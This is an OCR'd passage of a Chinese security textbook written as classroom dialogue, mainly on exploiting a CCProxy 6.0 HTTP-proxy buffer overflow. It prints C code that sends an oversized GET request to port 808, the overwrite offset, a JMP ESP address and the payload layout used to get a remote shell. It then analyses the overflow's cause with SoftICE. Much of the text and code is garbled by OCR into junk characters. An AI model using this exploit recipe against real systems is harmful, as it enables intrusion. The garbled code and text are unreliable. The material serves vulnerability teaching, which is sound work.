" CONSOLE" D '" MBCS" 
IFp"ReleasefGetShellCodeByC.pch" [YX JFo"Release/" a 








可 见 选项 包 


ТЕ : /nologo /MLd /W3 /Gm /GX /ZI /Od /D "WIN32" /D " DEBUG" /D " CONSOLE" /D " MBCS" /Fp"E 


和 release 版 本 的 差别 有 : 


/MLd : 与 LIBCD .LIB 调 试 库 链接 ，LIBCD .LIB 是 调试 版 本 
/Gm[-] : 启用 最 小 重新 生成 

/ZI : 启用 调试 信息 的 “编辑 并 继续 ”功能 

/0d : 禁用 优化 


оО: 好 像 有 人 在 命令 行 下 编程 ， 那 是 如 何 实 现 的 ? 


A: 其 实 VC 的 本 质 是 一 个 C/C++ 编译 器 ， 而 我 们 看 到 的 界面 ， 都 是 上 层 的 东西 。VC 的 编译 器 
程序 是 \VC98\Bin 目 录 下 的 cl.exe， 我 们 可 在 DOS 环 境 下 通过 它 来 编译 程序 。 步 又 如 下 : 先 运 
行 同 目录 下 的 VCVARS32.bat， 设 置 环境 变量 ; 然后 束 可 执行 cl.exe， 如 cl.exe ww.cpp , m 
会 生成 ww.exe。 如 果 有 必要 ， 还 可 加 上 那些 编译 选项 。 


Q : 防火 墙 的 技术 和 实现 原理 是 什么 ? 


A : 防火 墙 分 企业 级 和 个 人 防火 墙 两 种 。 企 业 级 的 防火 墙 ， 实 现 思路 要 简单 一 点 。 一 般 的 厂商 
都 是 利用 公开 源码 的 Linux， 重 编译 内 核 ， 加 上 安全 选项 ， 裁 减 加 固 ， 再 做 个 用 户 界面 ， 就 可 
作为 防火 墙 商 品 了 。 而 Windows 下 的 个 人 防火 墙 ， 反 而 还 要 麻烦 一 点 ， 涉 及 到 HOOK 技 术 和 
底层 驱动 程序 的 开发 。 


Q : HASH 听 起 来 很 熟悉 ， 有 什么 用 处 呢 ? 


A : HASH 可 用 于 高 效 查 找 ， 而 且 在 数字 签名 中 发 挥 了 重要 作用 。 


第 七 章 、 漏 洞 的 发 现 、 分 析 和 利用 
12 月 ， 平 安 夜 、 圣 证 节 、 元 旦 ， 接 着 就 是 寒假 和 春节 。 整 个 校园 充满 了 一 种 节日 的 氛围 和 思 


亲 的 情绪 。 


“大 家 圣诞 节 准 各 怎么 过 啊 ? "老病 喜欢 在 正式 上 课 前 聊 聊 别 的 ， 好 让 大 家 的 注意 力 慢 慢 集中 起 
来 。 


REKKE- m, ЖИНИНЕ E — 5 1 "ЕЕ UL. 
大 家 都 大 笑 起 来 。 


“外 国人 的 节 有 什么 好 过 的 ， 我 要 好 好 准备 考试 ， 然 后 回 家 过 春节 ， 和 与 家 人 团聚 上 "古风 认真 的 
说 道 。 


“对 呵 ， 老 羡 ， 我 们 接着 有 很 多 门 的 期 末 考 试 呢 ， 这 门 课 .…… " 宇 强 问 道 。 


， 我 理解 大 家 的 意思 1! 这 门 课 需要 真正 的 实践 ， 要 亲 目 编写 才 行 。 纸 上 的 考试 并 不 能 检查 
uu eM эу EE 


“ 哦 1! 太 好 了 【1” 教 宇 里 一 阵 欢 腾 。 


“我 会 在 课 中 布置 一 点 作业 ， 大 家 在 寒假 里 完成 ， 下 学 期 开学 艾 来， 作为 考试 的 成 绩 。 本 学 期 
最 后 两 次 课 ， 涉 及 到 一 个 大 家 感 兴趣 的 东西 一 一 漏洞 的 发 现 、 分 析 和 利用 。” 





“好 啊 ! 终于 讲 到 漏洞 本 身 了 ! "大 家 都 很 高 兴 


“了 呵呵， 不 过 ， 我 有 并 在 先 ， 难 度 比 较 大 ， 也 有 点 抹 烦 ， 大 家 可 要 仔细 和 耐心 啊 ! 我 们 先 来 看 
一 个 具体 例子 一 一 CCProxy 软 件 的 漏洞 1 " 


7.1 CCProxy 漏洞 的 分 析 


“CCProxy 是 个 代理 服务 器 ， 支 持 HTTP、FTP、Telnet 等 多 种 服务 。 当 有 多 台 主 机 ， 而 只 有 一 
个 公 网 出 口 时 ， 可 将 CCProxy 安 装 在 出 口 主机 上 ， 作 为 一 个 代理 服务 器 。 其 他 机 器 就 可 通过 
连接 CCProxy 代 理 来 访问 外 网 。” 


老病 说 :“ 这 种 结构 特别 适合 小 型 网 络 和 个 人 家 寿 的 使 用 ， 典 型 的 CCProxy 配 置 如 图 7 一 1。” 





安装 CCProxy 





"Hy 1 " 衬 强 说 道 , “ 那 我 可 以 把 妈妈 打字 用 的 那 台 386 也 连 上 网 去 ， 以 后 融 不 用 争 电脑 打 泡 光 牡 
fo^" 


“ 萎 宇 里 上 网 也 方便 了 ! "大 家 纷纷 说 道 。 


7.1.1 CCProxy 的 安装 与 设置 


“我 们 安 委 一 个 实际 用 用 吧 ! 安 疼 过 程 很 简单 ， 如 同一 般 软 件 的 安 疼 一样。 安 疼 完毕 后 ， 启动 
CCProxy， 其 界面 如 图 7 一 2。” 


ССРгоху 6. О (л A UE KP ub 


CCProxy 人 《IEIE YA 


Copyright (С) 2000-2003 YoungZSoft 10:05:42 





“这 个 界面 真是 简单 明了 啊 1 "= RB < Y BRHB. 

“是 的 ， 设 计 得 很 清晰 ， 所 有 操作 一 看 就 知 。 我 们 自己 设计 软件 时 ， 也 要 注意 界面 的 人 性 
化 。” 老 病 说 遵 ,，“ 如 果 要 对 CCProxy 进 行 设置 ， 点 击 工 具 栏 上 的 设置 ' 按 和 钮 ， 弹 出 设置 对 话 
框 ， 如 图 7 一 3。 ” 
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请 选择 本 机 局 域 网 IF 地 址 : м 自动 检测 


[ NIME 





“所 有 常用 的 服务 都 已 经 配置 好 了 。 我 们 看 ，HTTP 代 理 服务 采用 的 是 808 端 口 。 所 以 在 内 部 其 
他 机 器 上 ， 点 击 虑 菜单 的 ' 工 具 栏 一 Internet 选 项 ， 在 弹出 对 话 框 中 选择 连接 ' 选 项 卡 ， 有 再 点 
击 ' 局 域 网 设置 :， 就 可 设置 浏览 器 的 代理 为 安装 CCProxy 主 机 的 I|P， 端 口 为 808， 如 图 7 一 4。” 


7.1.1 CCProxy 的 安装 与 设置 330 


Б (ТАН) KA 
Вес 


| | 自动 检测 设置 4) 
癌 ] 使 用 自动 配置 脚本 (S) 


TUER 35-38 


[2] 23 LAN FARNERS Q0 ОЛЕН ЕЕН ТЇЙ ӨН 


Hahk QE): |192. 168.3. 151 | XRO (T): 808 
对 于 未 地 地 址 不 恒 用 代理 服务 器 (В) 





“这 下 可 以 通过 CCProxy 代 理 浏 览 外 面 的 网 页 了 。” 
"E, diem p 


“ 吧 ， 除 了 808 端 口 ，CCProxy 还 开放 了 1090、2121 等 端口 。CCProxy 6.0 版 本 有 多 你 漏洞 ， 
这 里 我 们 就 分 析 对 808 端 口 请 求 超 长 'GET' 字 符 串 时 ， 会 引发 的 缓冲 区 浴 出 漏洞 。” 


7.1.2 漏洞 的 定位 和 利用 
"我 们 用 VC 写 一 个 程序 ， 往 CCProxy 的 808 端 口 发 送 超 长 字符 串 ， 其 格式 如 下 : ” 


GET NAAAAAAAAAAAAAA (4085 个 A) HTTP/1.0NXODNXOANXODNXOA 


“发 送 程序 4085byte.cpp 《光盘 有 收录 ) 比较 简单 ， 融 是 网 络 通信 的 客户 问 程 序 。 给 出 源 代 码 
如 下 ， 大 家 可 以 再 巩固 一 下 socket 编 程 。” 


#include <winsock2.h> 
#include <stdio.h> 

4pragma comment(lib,"Ws2 32") 
int main() 


WSADATA ws; 

SOCKET s; 

int ret; 

char buf[5000]; 

int i; 

int nLen; 

// 初 始 化 wsa 

WSAStartup(MAKEWORD(2, 2), &ws ) ; 

// 建 立 socket 

s-WSASocket(PF INET, SOCK STREAM, IPPROTO TCP, NULL, 0, ©); 
/ /i&$& 3173808 m Г] 

struct sockaddr in server; 

server.sin family - AF INET; 

server.sin port - htons(808); 

server.sin addr.s addr-inet addr("192.168.3.151"); 
/ / £ 1 


if (connect(s,(struct sockaddr *)&server,sizeof(server) ) < 0) 


printf("connect error"); 
return -1; 
j 
nLen - 0; 
strcpy(buf, "GET /"); 
nLen += sizeof("GET /")-1; 
for(nLen; піеп<4080+5; піеп++) 


buf[nLen] = 'A'; 


j 

buf[nLen] = 'N0'; 

strcat(buf, " HTTP/1.0NXO0DNXOANXODNXOA" ) ; 

nLen += sizeof(" HTTP/1.0NXxODNXOANXODNXOA" ) -1; 
// 构 造 字符 串 后 ， 发 送 

send(s, buf, nLen , ©); 

printf("send OK!" ); 

closesocket(s); 

WSACleanup(); 

return 0; 


“wg, MEE ESocket ti 2⁄2 15 ! F 8, ЕНЕ EA A o 


“对 【 请 注意 ， 发 送 数据 的 格式 一 定 要 保证 正确 ， 前 导 字 符 是 'GET /， 然 后 是 大 量 的 字符 'A， 
而 结束 字符 是 'HTTP/1.0\X0D\Xx0OA\X0OD\Xx0OA。 这 样 才 能 让 CCProxy 认 为 是 HTTP 的 请 求 ， 从 而 
处 理 它 。” 


"B, 1 \X0DWXOA 代 表 什 么 呢 ? "古风 问 道 。 


“这 是 HTTP 协 议 中 规定 的 请 求 结 束 标 志 ， 具 体 可 以 参看 RFC 文 档 1 "老病 回 答 道 , “我 们 发 送 给 
代理 服务 器 后 ，CCProxy 发 生 缓 冲 区 浴 出 ， 就 会 弹出 出 错 对 话 框 ，XP 下 如 图 7 一 5。” 


CCOCProxzy HW#ficrosott EFC Application 


CCProxy Microsoft МЕС Application 通 到 问题 需要 关闭 。 我 
fl Trib S SES (RESISTE 


如 果 悠 正 处 于 进程 当中 , 信息 有 可 能 去 失 。 


请 将 此 问题 报 肯 给 Microsofta 

HICE Т —1+@ Еш АТО Е ЈЕВ ЗИЧ. XS 
НЕНАЧЕ 567. 

要 查看 这 个 错误 报 肯 包含 的 数据 ， 十 音 击 此 处 。 


调试 @) | 发 送 错 误 报告 б) 


" 慌 哟 ， 和 Win2000 的 不 一 样 也 ， 看 不 到 出 错时 EIP 的 值 l ERR, 








不， 我们 也 可 以 看 。 点 击 蓝 色 的 字 ‘请 单 击 此 处 '。 就 可 看 到 图 7 一 6 的 报错 框 。 其 中 第 二 排 
有 Offset : 41414141' 。 表 示 执 行 0xX41414141， 就 是 ‘AAAAN 的 16 进 制 1” 


ССРтоху Bicrosoft EFC Application 


[сес 
ÁppName: ссргоху, exe hnpVer- 2 0.0. 1 МодНате: unknown 


ModVer: 0.0.0.0 [Offset: 41414141 


报 肖 详细 信息 一 -一 
I talep = Bis. EROS Microsoft МЕС Application КНЕ А ; 正在 使 
用 的 操作 系统 版 本 及 1 十 算 机 硬件 ; E Product ID, 读 标 识 号 可 用 于 识别 您 的 许可 证 ; 
Буру ес ДЕ aS 


ПСЕ ЦЕ ШЕПТЕ. PEA. ИШ. ВРАГА А hits unu AGRSUEES. ЇН 
== ЧЕГЕ а! ЕНА Е, TE BID VHS. ITIS АНГ Be = HH T LUE 
МАЙ, Вай ho I BRIT RB. 


TL IPRC SER H яаа, ЗОРЕ B Mis i.n] FH 


, 在 你 报告 该 问题 时 ， 我 们 会 此 
知 您 。 这 个 错误 报告 将 使 用 安全 的 数据 库 连 接 发 送 ， 该 数据 库 员 亿 有 限 人 员 访 问 ， 而 且 称 的 
报告 不 会 用 于 市 场 推广 。 


要 查看 关于 错误 报告 的 技术 信息 ， 请 单 击 此 处 。 
要 查看 web 上 的 数据 收集 策略 ， 请 单 击 此 处 。 





“ 哦 ， 那 还 是 和 Win2000 下 的 一 样 了 1 " 宇 强 满意 的 说 ,，“ 我 们 只 需 改 变 buf 的 赋值 过 程 ， 分 别 定 
位 千 位 、 百 位 、 十 位 和 个 位 就 可 以 了 。” 


“是 的 1" 上 古风 束 要 去 改变 程序 了 


“等 等 ， 等 等 | "老病 急 阻 止 , “定位 我 们 已 经 详细 的 讲 过 了 ， 这 里 不 是 重点 。 具 体 的 定位 程序 
下 来 大 家 参考 CCProxy1.cpp、CCProxy2.cpp、CCProxy3.cpp、CCProxy4.cpp (光盘 有 收 
录 ) ， 它 们 分 别 定 位 千 位 、 百 位 、 十 位 和 个 位 。” 


“大 家 下 去 可 自己 练习 一 下 。 通 过 它们 ， 我 们 可 定位 出 : 从 4052 个 A 开始 的 地 方 束 是 返回 点 。 
当然 ， 验 证 还 是 有 必要 的 ， 我 们 把 数组 全 部 赋 为 A， 而 4052 开 始 的 4 个 字 节 赋 为 B， 构 造 如 
qe 


for(i-0; 52090; 1++, піеп++) 
buf[nLen] = = 'A' 


buf[404745] = рз 
buf[404845] = 'B'; 
buf [4049+5] = 'B'; 
buf [4050+5] = 'B'; 


“重新 启动 CCProxy， 运 行 修 改过 后 的 测试 程序 。 这 次 弹出 的 对 话 框 如 图 7 一 7， 果 然 是 
4242424228 i 1] 7 3x [B] ARo 


CCProzy Nicrosoft EFC Application 


тала 
ÀppName: ccproxy. exe ÀÁppVer: 2.0.0.1 ModHame: unknown 


ModVer: 0.0.0.0 f Offset: 42424242 


BAASE - 
这 个 错误 报告 包括 : 问题 出 现时 CCProxy Microsoft MFC Application 的 状态 信息 ; 正在 使 
用 的 操作 条 兵 版 本 及 计算 机 三 件 ; ШЗ ТР Product ID, Жїк SR) ATRAER BI üE ; 
ELRTSBUVPESI Internet Hh CF) 地 址 。 


我 们 无 意 收 集 您 的 净 件 、 姓 和 名、 地 址 、 电 子 邮 件 地 址 或 其 邮 任 何 形式 的 个 人 识 列 信息 。 但 
是 ; 错误 报告 可 能 包含 特定 用 户 信 息 ， 如 来 目 打开 文件 的 数据 。 这 个 信息 可 能 会 用 于 确 愉 你 
的 身 浴 ,但 如果 身份 已 经 明示 ， 则 个 会 使 用 这 个 信息 。 


知 您 。 这 个 错 | Аи Уа 
报告 不 会 用 于 市 场 推广 。 


要 查看 关于 错误 报 肖 的 技术 信息 ， ”十 单 击 此 站。 
要 查看 web 上 的 数据 收集 第 略 ， 请 单 击 此 








“证 明 的 确 是 4052 的 地 方 履 盖 了 返回 点 。 有 了 返回 点 的 位 置 ， 写 出 利用 程序 简直 融 是 轻 车 融 路 
了 1" 老病 说 道 。 

“是 啊 ， 我 们 覆盖 4052 个 A， 然 后 是 JMP ESP 的 地 址 ， 这 个 是 ...... 是 ......” 玉 波 挠 了 搁 后 脑 勺 。 
古风 一 口 答 道 : “是 0x7FFA4512。 

“对 上 最 后 跟 上 ShellCode， 按 照 下 面 这 个 格式 就 行 了 。 


GET /АААА(4052%А).. JMP ESP 地 址 SHELLCODE HTTP/1.0 


"m | 是 的 。 "老病 补充 道 , “但 因为 覆盖 了 4052 个 字 节 ， 所 以 我 们 可 以 把 ShellCode 放 在 前 面 ， 
而 在 JMP ESP 的 地 址 后 放 一 个 JMP BACK 的 指令 ， 跳 回 到 ShellCode 中 。 格 式 就 像 这 样 :， 


GET N АААА..АА ShellCode Ox7FFA4512 JMPBACK HTTP/1.0 


大 家 都 点 头 称 是 。 


“4000 多 个 字 节 ， 不 用 实在 浪费 了 ， 而 且 加 在 后 面 ， 反 而 可 能 会 引发 异常 。 好 ! ShellCode 用 
完成 开端 口 功 能 的 代码 。 我 们 构造 出 利用 程序 JmpEspShell.cpp (光盘 有 收录 ) 。 执 行 上 登陆 
成 功 ! 如 图 7-8。” 


un IapEZSPIaproveShsll _ icrosoft Wisual C++ 一 [IapESPImprnveShell. c] 





Fi Edit View Insert Project Bui onls fhuiverstucio Window Help _ m x 
[3 File E V I F Build ls B 5 daw Hel | x 














E = d Phe - Ty E = "T “|! h upg Ux s m 4) ё 
| [Globals] *|| [An global members «|| ~A" £m p | [ul Jh 
aj x] struct sockaddr in seruer; E 

| = == T" unsigned Short port ; 
о 2 JmpESPImproveShell classes LET usa 

ША tar tup( HaKEWORD (2,2) Eur); 

FT socket 

s-MSsHSocket(PF IMET, SUCK STREAM, IPPROTOU ТСР, NULL, B, d); 

ИРЕ 7; 80mm] 


sPruer.sin Fanily = ñF_IHET; 

жеше sin port = htons(BBB); 

sPruer.sin addr.s addr-inet addr('"192.168.3.151"); 
//ECELS amm L1 1 

if (connect(s5,(5truct sockaddr *)&seruer,sizeof(server) ) < H) 


printf("connect error"); 
return -1; 










š 

nLen = B; == Kian SS: Scit c i 
strcpy(buF, "GET Z") eend OKT 

пеп += sizeoF("GET /^')-1; eta any key to continue 











Ffnr(i=0; i<BhÜB8B; i++,mLen++) 
Duf[m em] = "A"; 


cx Ielnet 192. 105. 3. 101 













* 35 ClassView | š] FileView 
Hicrasaft Windows ХР [Пух 5.1.2600] 
Xx] КТМУ ИЧМЕ TET At E 2, = De [л ЧУ =] 1985-2804 Microsoft Corp. 
Jr astun ЕА RI VÀ 

Linking... "ER 
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7.1.3 漏洞 的 分 析 


"Yeah ! 成 功 1" 大 家 都 叫 了 起 来 ， 然 后 纷纷 说 道 ，“ 虽 然 成 功利 用 过 多 次 ， 但 真 的 对 一 个 新 汤 
洞 利用 成 功 了 ， 还 是 有 点 激动 的 ， 呵 呵 1” 


“这 很 好 啊 | 其 实 正 是 这 些小 小 的 成 束 ， 让 你 品尝 到 了 努力 成 功 后 的 喜 避 。 这 样 才 能 触动 你 的 
进一步 发 展 ， 实 现 真 正 的 成 功 。 "CE BOB. 


“好 了 ， 进 入 我 们 的 重头 戏 ， 来 分 析 漏 洞 的 成 因 吧 ! ” 

“好 啊 ! 这 下 可 以 看 看 实际 程序 中 的 漏洞 是 怎样 出 现 的 了 。 "大 家 高 兴 的 说 。 

“首先 启动 我 们 的 调试 利器 一 一 SoftICE。” 

“зш, frjmp esp 转 换 成 call ebx 的 利用 方式 那里 我 们 使 用 过 ， 果 然 很 强大 1 "古风 真是 好 记性 。 


“这 位 同学 记忆 力 真 好 ! 这 里 我 们 会 进一步 深入 使 用 它 。 启 动 CCProxy， 再 重新 发 送 全 ' 信 的 过 
长 数据 。 


因为 会 产生 异常 ， 所 以 SoftIlCE 就 会 捕获 异常 ， 自 动弹 出 来 。 停 在 了 下 面 这 句 话 : 


001B : 41414141 INVALID 


小 知识 : 


SoftICE 默 认 情 况 下 是 开 了 异常 捕获 功能 的 。 即 有 什么 异常 发 生 时 ， 会 目 动 激活 SoftICE。 我 们 
可 使 用 指令 Faulton 和 Fault off 来 打开 或 关闭 异常 捕获 功能 。 


“001B : 41414141 INVALID 意思 是 41414141 指 向 的 指使 非 法 。” 老 炳 解释 道 。 
“ 哦 ! 那些 指 今 究 竟 是 什么 数据 呢 ? " 宇 强 进一步 问 道 。 
“在 SoftICE 下 ， 我 们 输入 code on 命 伯 显 示 机 器 码 ， 束 可 以 看 到 对 应 的 地 方 全 是 FFFF 数 据 。” 


001B : 41414141 FFFF INVALID 


“ 哦 | » 


“我 们 再 看 看 上 下 左右 相 天 的 数据 吧 ， 输 入 data ©з, 2.9 T AU D. TAE A d 
eip ， 惑 会 在 数据 窗口 中 显示 出 如 下 的 值 。” 


001B : 41414141 ?? ?? долы ?7 ?? 7? 
0018 : 41414151 ?? ?? ??7 ?7 ?? o 


“上 下 左右 都 是 非法 的 啊 ?” 


“是 的 ， 因 为 没有 代码 加 载 在 这 个 部 分 ， 所 以 系统 默认 填充 1， 丈 是 全 F。” 老 羡 解 释 道 , “而 我 
们 的 关键 ， 融 是 要 找到 发 生 问 题 的 那 段 程序 。” 


5 我 们 看 看 现在 堆栈 里 面 的 值 ， 和 前 面 类 似 ， 这 里 用 命令 d esp ， 就 出 现 了 现在 堆栈 数据 的 情 
A." 


esp = 012A790C 
0023:012A790C 41 41 41 41 41 41 41 41—4 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 


0023:012A791C 41 41 41 41 41 41 41 41—4 41 41 41 41 20 48 54 AAAAAAAAAAAAA HT 
0023:012A792C 54 50 2F 31 2E 30 OD OA TP/1.0 


“ЕРА PUR 1482324111 3В703878 01, RMD EMUN S BUE FR 21] F] Poss Віа, " 


“ЖП — F, SUufEESP-—012A790C, FRORA, JÉXXIBAESPSIBIO12A790C ; 所 
以 应 该 是 某 个 函数 〈 假 设 是 函数 A) 执行 前 把 返回 地 址 存在 了 012A790C 一 4 或 附近 中 ; 然后 
在 函数 A 执 行 过 程 中 作 了 无 长 度 限 制 的 字符 串 拷 贝 ， 使 返回 地 址 被 覆盖 成 了 我 们 发 送 的 
41414141 ! " 


“ЯВАА АЗ, xe HAKA ; 而 无 长 度 限制 的 字符 串 找 贝 就 是 Strcpy、Strcat 一 类 的 操作 。 
“ 哦 ， 难 道 我 们 要 猜测 哪个 画 数 A 在 012A790C 附 近 中 保存 了 返回 地 址 ?” 宇 强 说 道 。 

“非常 正确 ! "老病 特别 高 兴 , “第 一 种 方法 : 用 bpx 命 合 往 Strcpy、Strcat 等 男 数 入 口 处 设 断 
点 ， 然 后 返回 函数 A 的 空间 ， 看 是 否 会 出 现 履 凋 问 题 。” 

“第 二 种 方法 ， 因 为 函数 A 会 往 012A790C 附 近 写 入 返回 地 址 ， 所 以 我 们 设置 断 点 ， 在 往 
012A790C 这 个 地 址 写 东 西 时 中 断 下 来 ， 看 能 否 找 到 有 问题 的 函数 入 。 

“我 们 这 里 用 第 二 种 方法 。 


“退出 SoftICE， 回 到 Windows 下 重新 启动 CCProxy。 再 进入 SoftICE 输 入 addr d 表示 进 
入 进程 空间 ; 然后 输入 bpmd 012A790C w ， 表 示 往 012A790C 写 东西 时 停 下 来 。 


大 家 眼睛 都 看 得 直 直 的 ， 小 倩 也 在 边 听 边 记 。 

“好 ， 设 置 完毕 后 ， 我 们 再 运行 攻击 人 代码， 这样 ， 当 往 012A790C 写 入 的 时 候 ， 束 会 被 SoftICE 
Ф. 

“运行 过 程 中 ， 会 有 好 几 次 中 断 ， 但 显然 都 不 是 保存 函数 返回 地 址 的 操作 ， 我 们 按 F5 继 续 让 它 
执行 。 终于 到 了 下 面 这 人 句 时 ， SoftICE FR Br ЊН, "E Jm ds E КШ ҤЕ S b о 


0040F2A0 : call 0040A410 


"I; ESP —012A790C, BD iBE[BIHSHEUETETEO12A790CrB, Жай 20040А410 4Р1 АЁ 
А17. REREN, EME T ENIRO E, НН EE." 


“Ж#Н US He, £ Fi В ТЕ ?我 们 跟 进 去 看 看 吧 | 按 F8 动 态 跟 踪 进 00404410 BR 
内 部 。” 


"atv | 这 里 全 是 反 汇编 的 代码 ， 怎 么 能 看 懂 啊 ?" 玉 波 呈 了 起 来 。 


“直接 让 你 看 出 有 问题 的 地 方 ， 的 确 比 较 困 难 。 但 我 们 是 在 动态 跟踪 啊 1 当 有 Push push call 
时 ， 我 们 束 知 道 这 是 在 调用 阔 数 ， 然 后 可 以 通过 d 命 命 来 查看 参数 究竟 是 什么 。” 


“我 们 实际 来 使 用 一 通 吧 ! 当 执 行 到 0040A5F8 : 55 push ЕВР 这 句 时 ， 我 们 输入 d ЕВР, 
发 现 压 人 的 参数 内 容 是 : ' 


192.168.3.150 unknown Web GET /AAAAAAAAAAAAAAAAAAAAAAAAA 


"DES ! 融 是 我 们 发 送 的 字符 串 多 了 一 些 示 西 1 
“ 越 来 越 近 了 | 就 要 水 落石 出 了 吧 | "大 家 议论 纷纷 。 
“ш | 我们 继续 。 接 下 来 是 这 句 指令 DC 


0040A5F9 : 51 push ECX 


“输入 а есх 命 分 ， 发 现 内 容 是 时 间 信 息 。 为 : 2004-11-25 16:46:56 , ” 


“下 一 名 : 0040A601: PUSH 0046F110 。 我 们 输入 d 0046F110 MP, £ mÆ [%s] %s 格式 
Ibẹ l” 


“最 后 ，PUSH edx, Cal 一 个 函数 。 我 们 根据 分 析 参 数 的 内 容 ， 知 道 应 该 是 执行 下 面 类 似 
的 函数 。” 


wwspritnf ( edx, 
[%s] %s 
2004-11-25 16:46:56 
### 192.168.3.150 unknown Web GET /AAAAAAAAAAAAAAAAAAAAAAAAA 


“这 个 拷贝 操作 是 把 日 期 、 时 间 和 我 们 发 送 的 过 长 字符 串 ， 找 贝 到 EDX 指 同 的 内 存 中 ; 因为 没 
有 字符 串 关 度 的 限制 ， 所 以 把 保存 的 EIP 也 履 关 了， 从 而 导 致 浴 出 。” 


“ 哦 ! 原来 漏洞 真 的 是 这 样 产 生 的 啊 ! "同学 们 说 道 。 


“我 们 通过 代码 来 计算 一 下 履 盖 点 的 位 置 和 长 度 。 此 时 EDX=012A6904， 为 字符 串 保 存 的 起 
始 地 址 ; 而 ESP= 二 012A790C， 为 保存 的 函数 返回 地 址 。” 


"m ^"WuBIBX, ESP—EDX-7012A790C—012A6904—0x100824104, Я, shi 
4104962 Jc BJ REFERS, -FBESIUIA KURE ҢЫ " 


“刚才 ， 我 们 定位 得 到 的 A 的 长 度 是 ?" 老 十 问 道 。 


"4056 ! "古风 一 口 报 了 出 来 。 


"E ! 好 记性 ! 大 冢 看 看 参数 ， 除 了 我 们 的 A， 还 包括 日 期 、 时 间 、IP、unknow WEB 和 GET 
等 字符 串 ， 再 加 上 格式 化 输出 [%s ] %s 中 的 字符] 字符 和 一 个 空格 ， 大 家 数 数 有 多 长 1” 


“ор 一 共 是 48 个 字 节 。 "古风 很 快 的 数 完 后 说 道 。 
“对 1 所 以 我 们 覆盖 的 A 正好 是 : 分 配 空间 一 其 他 字符 长 度 =4104 一 48 二 4056 ! ” 
“ 哦 ! 原来 是 这 样 啊 1” 


“我 们 继续 执行 。 有 果然， 保存 的 EIP 被 履 盖 ; 所 以 ， 融 是 这 个 函数 的 执行 导致 了 缓冲 区 浴 出 ， 
分 析 成 功 |” 


小 结 漏洞 分 析 过 程 : 

1. 启 动 有 漏洞 程序 ， 和 启动 SoftICE 并 打开 异常 捕获 开关 (默认 打开 ) 

2. 发 送 过 长 的 字符 串 ， 引 发 程序 的 异常 ，SoftICE 弹 出 ，; 

3. 查 看 此 时 的 ESP 的 值 并 记 下 ， 假 设 是 AAAA ; 

4. 退 回 用 户 空间 ， 重 新 启动 漏洞 程序 ; 

5. 按 CTRL 十 D 进 入 SoftICE， 用 addr 命令 进入 程序 空间 ; 再 用 bpmw AAAA w RESMA ; 
6. 再 次 发 送 过 长 字符 串 ; 


7.SoftICE 会 在 往 AAAA 地 址 写 操 作 时 弹出 来 ; 我 们 可 分 析 是 哪 一 个 函数 在 该 点 保存 了 返回 地 
ШЕ; 


8. 跟 入 该 画 效 ; TEX Наар s scm ETE JS НН Н) 24 5428 Z22% à; 当 发 现 某 个 画 效 有 我 们 发 送 的 
过 长 字符 串 和 '%s' 一 类 的 参数 时 ， 融 仔细 分 析 ， 多 半 是 该 操作 的 问题 ! 从 而 分 析 清 楚 漏 洞 产生 
的 原因 。 


7.2 黑 盒 法 探 ЛЛ КЫ 8] 0 Python 脚本 


"EE 1! 好 啊 1” 大 家 都 情不自禁 的 鼓 起 掌 来 。 

“怎么 样 ? 大 家 有 收获 吗 ? ”老病 向 台 下 问 道 。 

“有 啊 ， 不 仅 知道 了 程序 有 浴 出 漏洞 ， 洽 出 点 在 哪个 位 置 ， 还 知道 了 为 什么 会 有 漏洞 。” 古 风 说 
道 ，"“ 不 仅 知 其 然 ， 还 知道 了 其 所 以 然 1” 

“看 来 实际 的 软件 存在 渝 出 漏洞 ， 还 是 用 了 Strcpy 这 类 没有 限制 长 度 的 拷贝 啊 1” 小 倩 用 了 有 瞬 
眼 。 

吧 ， 更 知道 了 调试 分 析 漏 洞 的 方法 1 ” 玉 波 满意 的 说 道 。 

“对 | 这 个 才 是 最 重要 的 | ”老病 笑 着 说 , “这 样 ， 大 家 .以 后 才能 独 目 分 析 新 的 漏洞 、 新 的 特 
例 。 真正 在 解决 问题 中 提高 自己 。 

“但 ， 我 感觉 漏洞 的 发 现 还 是 有 偶然 性 啊 1 ” 宇 强 说 ，“ 需 要 正好 发 这 个 包 时 ， 程 序 朋 汪 了 , + 
能 发 现 漏洞 ， 要 有 好 大 的 运气 啊 ! ” 

“虽然 的 确 有 一 定 的 偶然 性 ， 但 只 要 我 们 按照 一 定 的 方法 ， 遵 循 一 定 的 规则 ， 就 可 在 尽量 短 的 
Bd ja] [А], ыы ыас ”老病 说 道 , “这 就 是 测试 的 基本 原理 ; 而 测试 ， 分 为 黑 盒 
测试 和 白 盒 测试 两 种 。 


7.2.1 墨盒 测试 原理 


“ 黑 铭 法 测试 ， 是 在 不 知道 软件 内 部 结构 、 程 序 流程 和 处理 代码 的 情况 下 ， 从 软件 声称 的 功能 
出 发 ， 测 试 检测 每 个 功能 是 否 都 能 正常 使 用 。” 


“所 以 黑 盒 测试 也 称 功 能 测试 ， 它 把 程序 看 作 一 个 不 能 打开 的 黑 盆 子 ， 在 完全 不 考虑 程序 内 部 
结构 和 内 部 特性 的 情况 下 ， 在 程序 接口 进行 测试 。” 


“我 们 无 法 证 明 一 个 程序 是 正确 的 ， 哪 怕 是 一 个 很 简单 的 程序 。 ”老病 喝 了 口水 后 说 道 。 
“了 唔 ?什么 意思 2?" 古风 不 解 的 问 。 


“因为 我 们 要 证 明 一 个 程序 是 正确 的 ， 融 需要 对 所 有 的 输入 都 证 明 ， 且 得 到 正确 的 结果 ， 而 这 
是 不 可 能 的 !” 


“ 举 个 例子 ， 上 比如 ， 两 个 整数 a，b 的 相 加 程序 ，z 二 a 十 b， 这 个 简单 吧 ? 我 们 要 验证 其 正确 
性 ， 束 得 把 a，b 所 有 的 取 值 都 输入 计算 一 通 ， 看 输出 的 结果 是 否 正确 。 


“在 VC 里 ， 整 型 的 范围 是 32 位 ， 大 概 就 是 一 2x10E9 一 十 2x10E9， 所 以 计算 机 能 表示 的 整数 的 
个 数 大 概 是 4x10E9 个 。 对 a 和 b 两 个 整数 来 说 ， 其 取 值 的 组 合 个 数 束 是 4x10E9x4x10E9= 
16x10E18 种 1” 


“假设 我 们 2 秒 中 验证 一 个 测 斌 数据， 那么 就 需要 16x10E18/2=8x10E18 秒 =25x10E10 年 1 就 
是 200 多 亿 年 的 时 间 ! ” 


“ 啊 | 不 算 不 知道 ， 一 算 环 一 跳 ! EREA T BRA. 


